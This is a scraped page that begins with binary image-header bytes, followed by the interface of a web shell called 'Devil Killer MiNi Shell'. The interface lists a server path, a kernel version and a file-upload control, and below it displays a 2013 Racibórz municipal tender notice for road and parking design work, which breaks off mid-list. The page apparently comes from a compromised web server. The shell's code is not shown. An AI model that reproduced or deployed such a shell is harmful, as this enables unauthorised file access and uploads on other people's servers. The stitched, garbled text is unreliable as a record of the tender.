JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130314/103074-N-2013.html

<p class="kh_header"><b>Racibórz: Opracowanie dokumentacji projektowo - kosztorysowej na remonty, przebudowy  ulic i miejsc parkingowych w Raciborzu</b><br>
<b>Numer ogłoszenia: 103074 - 2013; data zamieszczenia: 14.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Racibórz , ul. Stefana Batorego 6, 47-400 Racibórz, woj. śląskie, tel. 032 7550710, faks 032 7550725.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> raciborz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej na remonty, przebudowy  ulic i miejsc parkingowych w Raciborzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług obejmujących opracowanie dokumentacji projektowo-kosztorysowych, służących do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Przedmiot zamówienia został podzielony na 5 wyodrębnionych części.

Część I -  Opracowanie dokumentacji projektowo-kosztorysowej na remont ulicy Wybrzeżnej   w Raciborzu.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne:
1). długość odcinka drogi - 650 m, w tym odcinek nr I - 137 m, odcinek nr II - 57 m, odcinek nr III - 456 m,   
2). szerokość pasa drogowego zmienna: od 3,00 m do 6,00 m, 
3). zalecana szerokość jezdni (odcinek nr I) 4,00 m,
4). zalecana szerokość jezdni (odcinek nr II) 3,00 m,
5). zalecana szerokość jezdni (odcinek nr III) 3,50 m,
6). powierzchnia jezdni 2315 m2.

b). Zakres inwestycji:
1). profilowanie i zagęszczenie istniejącej nawierzchni, która będzie wykorzystana jako dolna warstwa podbudowy,
2). zalecana konstrukcja nawierzchni drogi (powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji 2-5 mm, kruszywo w ilości 8 dm3/m2, powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji  5-8 mm, kruszywo w ilości 10 dm3/m2, nawierzchnia z tłucznia kamiennego 0-31 mm -  gr. 7 cm ).
 
c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
7). opcja aktualizacji kosztorysu inwestorskiego
8). opcja pełnienia nadzoru inwestorskiego
d) Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. Projektu i specyfikacji technicznej wykonania i odbioru robót w formie
     papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf. 

Część  II - Opracowanie dokumentacji projektowo-kosztorysowej remont dróg dojazdowych do gruntów rolnych  - ul. Babicka w Raciborzu

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
W ramach zadania planuje się wykonanie remontu ul. Babickiej od istniejącej nawierzchni asfaltowej -  posesja nr 46 do końca zabudowy - posesja nr 62 
a). parametry techniczne:
-długość odcinka drogi - 720 m,   
-szerokość pasa drogowego zmienna: od 6,00 m do 10,00 m, 
-zalecana szerokość jezdni 4,00 m,
-powierzchnia jezdni 2880 m2.

b). zakres inwestycji:
1). profilowanie i zagęszczenie istniejącej nawierzchni, która będzie wykorzystana jako dolna warstwa podbudowy,
2). zalecana konstrukcja nawierzchni drogi (powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji 2-5 mm, kruszywo w ilości 8 dm3/m2, powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji  5-8 mm, kruszywo w ilości 10 dm3/m2, nawierzchnia z tłucznia kamiennego 0-31 mm -  gr. 7 cm ).
c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
7). opcja aktualizacji kosztorysu inwestorskiego
8). opcja pełnienia nadzoru inwestorskiego
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. Projektu i specyfikacji technicznej wykonania i odbioru robót w formie
     papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf. 

Część  III - Opracowanie dokumentacji projektowo-kosztorysowej na przebudowę  ul. Gajowej (od posesji nr. 28 do ul. Pogwizdowskiej) w Raciborzu.
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). podstawowe dane techniczne:
1). długość odcinka drogi (od istniejącej nawierzchni asfaltowej -  posesja nr 28 do istniejącej nawierzchni asfaltowej na ul. Pogwizdowskiej) - 265 m,
2). szerokość pasa drogowego 6,00, 
3). zalecana szerokość jezdni  3,50 m,
b). zakres inwestycji:
1). zalecana konstrukcja nawierzchni jezdni - ruch kategorii KR1 (warstwa ścieralna z betonu asfaltowego - 4cm,  warstwa wiążąca z betonu asfaltowego - 5 cm, podbudowa z tłucznia kamiennego 20 cm );
2). w pasie drogowym brak kanalizacji deszczowej dlatego w ramach zadania  należy przewidzieć wykonanie odwodnienia drogi.

c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
7). opcja aktualizacji kosztorysu inwestorskiego
8). opcja pełnienia nadzoru inwestorskiego
d) Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. Projektu i specyfikacji technicznej wykonania i odbioru robót w formie
     papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf. 
Część  IV - Opracowanie dokumentacji projektowo-kosztorysowej na przebudowę ulicy Górnej (I etap) w Raciborzu.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a).  podstawowe dane techniczne:
1). długość odcinka drogi (od ul. Jana Pawła II do posesji nr 31) -  310 m, w tym odcinek wymagający remontu nawierzchni - 60 m, odcinek wymagający przebudowy - 250 m,
2). szerokość pasa drogowego zmienna: od 7,50 m (na wysokości posesji  nr 1b÷25) do 6,00 (na wysokości posesji nr 25÷31), 
3). szerokość jezdni (część remontowana) 5,00 m,
4). zalecana szerokość jezdni (część przebudowywana) 4,50 m,
5). szerokość chodnika (prawostronny) 1,5 m
6). powierzchnia jezdni 1425 m2,
7). powierzchnia chodników i zjazdów 465 m2
b). zakres inwestycji:
1). roboty rozbiórkowe elementów istniejącej jezdni i chodników m.in. rozbiórka istniejącej nawierzchni asfaltowej na płytach żelbetowych, rozbiórka płyt żelbetowych drogowych, rozbiórka płyt betonowych chodnikowych i trylinki, rozbiórka krawężników  i obrzeży betonowych,
2). zalecana konstrukcja nawierzchni jezdni - ruch kategorii KR2  (warstwa ścieralna z betonu asfaltowego - 5cm,  podbudowa zasadnicza z betonu asfaltowego - 7 cm, podbudowa z tłucznia kamiennego 20 cm );
3). zalecana konstrukcja chodnika (warstwa ścieralna z kostki betonowej szarej - 8 cm, podsypka cementowo - piaskowa - 4 cm podbudowa zasadnicza  z tłucznia kamiennego -  15 cm) ; 
4). zalecana konstrukcja zjazdów (warstwa ścieralna z kostki betonowej czerwonej - 8 cm, podsypka cementowo - piaskowa - 4 cm podbudowa zasadnicza z tłucznia kamiennego-  20 cm).
c). zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). kosztorys inwestorski wraz z przedmiarem robót,
3). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych
4). specyfikacje techniczne wykonania i odbioru robót,
5). wymagane uzgodnienia.
6). opcja aktualizacji kosztorysu inwestorskiego i nadzoru inwestorskiego

d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu oraz specyfikacji wykonania i odbioru robót w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf. 

Część  V - Opracowanie dokumentacji projektowo-kosztorysowej  miejsc postojowych na ul. Książęcej w Raciborzu.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). podstawowe dane techniczne: 
1). długość odcinka drogi ul. Książęcej, na którym planuje się wykonanie miejsc    
  postojowych - 86 mb (od posesji nr 11 do zakończenia przy ul. Siwonia);
2). szerokość istniejącej jezdni około 5,6 - 6,0 m - jezdnia dwukierunkowa;
3). szerokość pasa drogowego (działka nr 565/2) około 11 m;  
4).  ilość miejsc postojowych minimum 15;
5). Projektant winien przedstawić 3 propozycje rozwiązań konfiguracji miejsc postojowych.

b). zakres inwestycji:
1). Roboty rozbiórkowe elementów istniejącej jezdni m.in.: rozbiórka krawężników;
2). Zalecana konstrukcja nawierzchni miejsc postojowych - warstwa ścieralna z kostki  betonowej szarej o gr. 8 cm, podsypka cementowo - piaskowa - 4 cm, podbudowa zasadnicza z tłucznia kamiennego - 20 cm; 
3). Istnieje możliwość pozyskania części działki nr 741/2 bezpośrednio przyległej do pasa drogowego - należącej do SM Nowoczesna;
4). W przypadku gdy przyjęte rozwiązania lokalizacyjne będą wymuszać konieczność wycinki drzew projektant uzyska wymagane zgody;

c). zakres opracowania:
1). Opracowanie mapy do celów projektowych;
2). Wykonanie minimum 3 wariantów rozmieszczenia miejsc postojowych, 
3).Uzyskanie wszystkich wymaganych uzgodnień (w tym decyzji dotyczącej ewentualnej wycinki drzew i przełożenia sieci energetycznej);
4). Opracowanie projektów budowlano - wykonawczych;
5). Uzyskanie zezwoleń na prowadzenie prac (pozwolenie lub zgłoszenie);
6). Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
7). Opracowaniu projektów organizacji ruchu;
8). Opracowaniu specyfikacji technicznych wykonania i odbioru robót

d). Inne istotne informacje:
Dokumentacja winna być opracowana w ilości:
- 4 egzemplarze Projektów budowlano - wykonawczych wraz z zagospodarowaniem  terenu oraz specyfikacji wykonania i odbioru robót w formie papierowej;
-  2 egzemplarze przedmiarów i kosztorysów inwestorskich;
- 1 egzemplarz kompletu dokumentacji projektowej w formie elektronicznej 
     w formacie pdf.

Wymagany termin realizacji zamówienia: dla części 1, 2, 3 i 4 do 30.04.2013 r., dla części 5 do dnia 15.06.2013 r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 0 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust. 1 pkt 2 ustawy.
2. Dokumenty dotyczące należenia do tej samej grupy kapitałowej tj. Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej o treści zgodnej z określoną w załączniku nr. 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień  umowy w niżej wymienionych  przypadkach:
1).Zmiany mające wpływ na termin wykonania przedmiotu umowy - możliwa jest zmiana terminu wykonania umowy, ewentualnie wstrzymanie i wznowienie prac projektowych, ze względu na:
a).oczekiwanie Wykonawcy na niezbędne opinie, decyzje itp., dotyczące realizacji zadania, leżące po stronie Zamawiającego,
b).przedłużenie procedury przetargowej,
c).uwarunkowania społeczne (petycje, protesty, itp.),
d).konieczność prowadzenia uzgodnień z właścicielami urządzeń obcych lub   właścicielami nieruchomości,
e).zmiany stanu prawnego  mające wpływ na realizację zadania.
2).Zmiany mające wpływ na wysokość wynagrodzenia:
a).zmiana stawki podatku od towarów i usług (VAT),
b).rezygnacja z wykonania części prac projektowych objętych umową</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bipraciborz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Racibórz, Referat Zamówień Publicznych, ul. Stefana Batorego 6, 47-400 Racibórz, pok. 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 11:30, miejsce: Urząd Miasta Racibórz, Referat Zamówień Publicznych, ul. Stefana Batorego 6, 47-400 Racibórz, pok. 310.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na remont ulicy Wybrzeżnej w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
1). długość odcinka drogi - 650 m, w tym odcinek nr I - 137 m, odcinek nr II - 57 m, odcinek nr III - 456 m,   
2). szerokość pasa drogowego zmienna: od 3,00 m do 6,00 m, 
3). zalecana szerokość jezdni (odcinek nr I) 4,00 m,
4). zalecana szerokość jezdni (odcinek nr II) 3,00 m,
5). zalecana szerokość jezdni (odcinek nr III) 3,50 m,
6). powierzchnia jezdni 2315 m2.

b). Zakres inwestycji:
1). profilowanie i zagęszczenie istniejącej nawierzchni, która będzie wykorzystana jako dolna warstwa podbudowy,
2). zalecana konstrukcja nawierzchni drogi (powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji 2-5 mm, kruszywo w ilości 8 dm3/m2, powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji  5-8 mm, kruszywo w ilości 10 dm3/m2, nawierzchnia z tłucznia kamiennego 0-31 mm -  gr. 7 cm ).
 
c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
7). opcja aktualizacji kosztorysu inwestorskiego
8). opcja pełnienia nadzoru inwestorskiego
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. Projektu i specyfikacji technicznej wykonania i odbioru robót w formie
     papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej remont dróg dojazdowych do gruntów rolnych  - ul. Babicka w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
W ramach zadania planuje się wykonanie remontu ul. Babickiej od istniejącej nawierzchni asfaltowej -  posesja nr 46 do końca zabudowy - posesja nr 62 
a). parametry techniczne
-długość odcinka drogi - 720 m,   
-szerokość pasa drogowego zmienna: od 6,00 m do 10,00 m, 
-zalecana szerokość jezdni 4,00 m,
-powierzchnia jezdni 2880 m2.

b). zakres inwestycji:
1). profilowanie i zagęszczenie istniejącej nawierzchni, która będzie wykorzystana jako dolna warstwa podbudowy,
2). zalecana konstrukcja nawierzchni drogi (powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji 2-5 mm, kruszywo w ilości 8 dm3/m2, powierzchniowe utrwalenie emulsją asfaltową, grys kamienny frakcji  5-8 mm, kruszywo w ilości 10 dm3/m2, nawierzchnia z tłucznia kamiennego 0-31 mm -  gr. 7 cm ).
c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
7). opcja aktualizacji kosztorysu inwestorskiego
8). opcja pełnienia nadzoru inwestorskiego
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. Projektu i specyfikacji technicznej wykonania i odbioru robót w formie
     papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na przebudowę ul. Gajowej (od posesji nr. 28 do ul. Pogwizdowskiej) w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). podstawowe dane techniczne:
1). długość odcinka drogi (od istniejącej nawierzchni asfaltowej -  posesja nr 28 do istniejącej nawierzchni asfaltowej na ul. Pogwizdowskiej) - 265 m,
2). szerokość pasa drogowego 6,00, 
